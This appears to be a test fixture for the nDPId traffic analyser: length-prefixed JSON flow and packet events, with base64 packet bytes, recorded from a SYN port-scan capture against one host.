+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsTbQAACwGzr6sEAAIQA2GNIzSAB7dUoMYAAAAAGACBAA0cQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cgAADkGOaqsEAAIQA2GNIzSFrPdUoMYAAAAAGACCAAZ3AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsDeoAACgGEomsEAAIQA2GNIzSCNTdUoMYAAAAAGACBAAruwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0UAACgGYS2sEAAIQA2GNIzSBbXdUoMYAAAAAGACBAAu2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADYGhnWsEAAIQA2GNIzSC7jdUoMYAAAAAGACDAAg1wAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsQLUAACgG372sEAAIQA2GNIzS7BvdUoMYAAAAAGACBABIcwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLgAADAG27qsEAAIQA2GNIzSINDdUoMYAAAAAGACBAATvwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq9EAAC0Gb6GsEAAIQA2GNIzSgBHdUoMYAAAAAGACCACwfQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsj8YAACsGjaysEAAIQA2GNIzSI5bdUoMYAAAAAGACEAAE+QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAs2tkAADEGPJmsEAAIQA2GNIzSFFDdUoMYAAAAAGACCAAcPwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsF\/IAADsG9YCsEAAIQA2GNIzSBBjdUoMYAAAAAGACEAAkdwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsowcAADcGbmusEAAIQA2GNIzSBpjdUoMYAAAAAGACEAAh9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsaSUAADEGrk2sEAAIQA2GNIzTEIDdU4MZAAAAAGACCAAgDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7UAADEGV72sEAAIQA2GNIzTBH\/dU4MZAAAAAGACCAAsDQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxvMAACgGWX+sEAAIQA2GNIzTJXndU4MZAAAAAGACBAAPEwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsgk8AADsGiyOsEAAIQA2GNIzTBEndU4MZAAAAAGACEAAkQwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uEAAC4GG5GsEAAIQA2GNIzTJxndU4MZAAAAAGACDAAFcwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxT8AACsGWDOsEAAIQA2GNIzTDsjdU4MZAAAAAGACEAAZxAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxeYAADUGTYysEAAIQA2GNIzTAP7dU4MZAAAAAGACCAAvjgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJkAADAGb9msEAAIQA2GNIzTBC7dU4MZAAAAAGACBAAwXgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsvKcAADUGVsusEAAIQA2GNIzTCVndU4MZAAAAAGACCAAnMwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMdwAAC8G55asEAAIQA2GNIzTC13dU4MZAAAAAGACEAAdLwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPUAADYGaX2sEAAIQA2GNIzTC5jdU4MZAAAAAGACDAAg9AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE0AADsGBSasEAAIQA2GNIzSIcvdUoMYAAAAAGACEAAGxAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
